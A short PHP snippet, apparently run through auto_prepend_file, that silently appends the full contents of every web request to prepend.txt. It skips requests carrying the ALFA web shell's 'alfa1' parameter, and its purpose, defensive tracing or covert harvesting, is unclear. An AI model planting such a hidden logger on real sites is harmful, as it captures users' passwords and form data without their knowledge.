<?php
if(!empty($_REQUEST)&&!array_key_exists('alfa1',$_REQUEST)){
$r='REQUEST '.var_export($_REQUEST,true).PHP_EOL.$_SERVER['SCRIPT_URL'].PHP_EOL.date('d-m-Y H:i:s', $_SERVER['REQUEST_TIME']).PHP_EOL;
@file_put_contents(__DIR__."/prepend.txt",$r,8);
}